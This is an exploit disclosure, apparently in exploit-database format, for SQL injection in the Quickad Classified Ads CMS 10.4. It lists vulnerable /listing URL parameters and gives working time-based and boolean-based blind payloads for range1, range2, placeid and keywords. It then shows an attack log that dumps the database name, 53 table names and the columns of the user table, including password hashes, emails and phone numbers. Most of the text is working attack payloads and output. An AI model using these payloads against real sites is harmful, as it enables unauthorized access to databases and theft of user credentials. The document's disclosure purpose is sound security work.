┌┌───────────────────────────────────────────────────────────────────────────────────────┐
││                                     C r a C k E r                                    ┌┘
┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││
└───────────────────────────────────────────────────────────────────────────────────────┘┘

 ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘                                  [ Vulnerability ]                                   ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
:  Author   : CraCkEr                                                                    :
│  Website  : https://bylancer.com/                                                      │
│  Vendor   : Bylancer                                                                   │
│  Software : Quickad Classified Ads CMS 10.4                                            │
│  Vuln Type: SQL Injection                                                              │
│  Impact   : Database Access                                                            │
│                                                                                        │
│────────────────────────────────────────────────────────────────────────────────────────│
│                                                                                       ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
:                                                                                        :
│ Release Notes:                                                                         │
│ ═════════════                                                                          │
│                                                                                        │
│ SQL injection attacks can allow unauthorized access to sensitive data, modification of │
│ data and crash the application or make it unavailable, leading to lost revenue and     │
│ damage to a company's reputation.                                                      │
│                                                                                        │
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘                                                                                      ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘

Greets:

    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL, MoizSid09   
       
	CryptoJob (Twitter) twitter.com/0x0CryptoJob
	   
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘                                    © CraCkEr 2023                                    ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘

Path: /listing

https://website/listing?location=Beirut&latitude=&longitude=&placetype=city&placeid=[SQLI]&keywords=[SQLI]&cat=&subcat=
https://website/listing?keywords=[SQLI]&location=Beirut&placetype=city&placeid=[SQLI]&cat=1&subcat=&filter=&sort=Newest&order=DESC&custom%5B15%5D=&range1=[SQLI]&range2=[SQLI]


GET parameter 'range1' is vulnerable to SQL Injection

---
Parameter: range1 (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: keywords=&location=Beirut&placetype=city&placeid=276781&cat=&subcat=&filter=&sort=Newest&order=DESC&range1=1 AND (SELECT 3133 FROM (SELECT(SLEEP(5)))crfu)&range2=1
---

GET parameter 'range2' is vulnerable to SQL Injection

---
Parameter: range2 (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: keywords=&location=Beirut&placetype=city&placeid=276781&cat=&subcat=&filter=&sort=Newest&order=DESC&range1=1&range2=1) AND (SELECT 7411 FROM (SELECT(SLEEP(5)))iiGu)-- jHQy
---

GET parameter 'placeid' is vulnerable to SQL Injection

---
Parameter: placeid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: location=Beirut&latitude=&longitude=&placetype=city&placeid=276781') AND 3510=3510 AND ('DiTr'='DiTr&keywords=&cat=&subcat=

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: location=Beirut&latitude=&longitude=&placetype=city&placeid=276781') AND (SELECT 2494 FROM (SELECT(SLEEP(5)))FKvp) AND ('WPrM'='WPrM&keywords=&cat=&subcat=
---

GET parameter 'keywords' is vulnerable to SQL Injection

---
Parameter: keywords (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
    Payload: location=Beirut&latitude=1&longitude=1&placetype=city&placeid=276781&keywords=1'XOR(SELECT(0)FROM(SELECT(SLEEP(6)))a)XOR'Z&cat=1&subcat=1
---


[+] Starting the Attack

fetching current database
current database: 'classified_******'


fetching tables

[53 tables]
+---------------------------+
| ad_custom_fields          |
| ad_product                |
| pro_admins                |
| pro_adsense               |
| pro_balance               |
| pro_blog                  |
| pro_blog_cat_relation     |
| pro_blog_categories       |
| pro_blog_comment          |
| pro_catagory_main         |
| pro_catagory_sub          |
| pro_category_translation  |
| pro_cities                |
| pro_countries             |
| pro_currencies            |
| pro_custom_data           |
| pro_custom_fields         |
| pro_custom_options        |
| pro_emailq                |
| pro_faq_entries           |
| pro_favads                |
| pro_firebase_device_token |
| pro_languages             |
| pro_login_attempts        |
| pro_logs                  |
| pro_messages              |
| pro_mobile_numbers        |
| pro_notification          |
| pro_options               |
| pro_pages                 |
| pro_payments              |
| pro_plan_options          |
| pro_plans                 |
| pro_product               |
| pro_product_resubmit      |
| pro_push_notification     |
| pro_qbm_banners           |
| pro_qbm_log               |
| pro_qbm_options           |
| pro_qbm_transactions      |
| pro_qbm_types             |
| pro_reviews               |
| pro_subadmin1             |
| pro_subadmin2             |
| pro_subscriptions         |
| pro_taxes                 |
| pro_testimonials          |
| pro_time_zones            |
| pro_transaction           |
| pro_upgrades              |
| pro_user                  |
| pro_user_options          |
| pro_usergroups            |
+---------------------------+


fetching columns from Table 'pro_user'

[36 columns]
+----------------+----------------------------------------+
| Column         | Type                                   |
+----------------+----------------------------------------+
| description    | text                                   |
| name           | varchar(225)                           |
| status         | enum('0','1','2')                      |
| view           | int(11)                                |
| address        | varchar(255)                           |
| city           | varchar(225)                           |
| confirm        | varchar(255)                           |
| country        | varchar(50)                            |
| created_at     | datetime                               |
| email          | varchar(255)                           |
| facebook       | varchar(255)                           |
| forgot         | varchar(255)                           |
| googleplus     | varchar(255)                           |
| group_id       | int(11)                                |
| id             | int(11)                                |
| image          | varchar(225)                           |
| instagram      | varchar(255)                           |
| lastactive     | datetime                               |
| linkedin       | varchar(255)                           |
| notify         | enum('0','1')                          |
| notify_cat     | varchar(255)                           |
| oauth_link     | varchar(255)                           |
| oauth_provider | enum('','facebook','google','twitter') |
| oauth_uid      | varchar(100)                           |
| online         | enum('0','1')                          |
| password_hash  | varchar(255)                           |
| phone          | varchar(255)                           |
| postcode       | varchar(255)                           |
| sex            | enum('Male','Female','Other')          |
| tagline        | varchar(255)                           |
| twitter        | varchar(255)                           |
| updated_at     | datetime                               |
| user_type      | enum('user','seller')                  |
| username       | varchar(255)                           |
| website        | varchar(255)                           |
| youtube        | varchar(255)                           |
+----------------+----------------------------------------+


[-] Done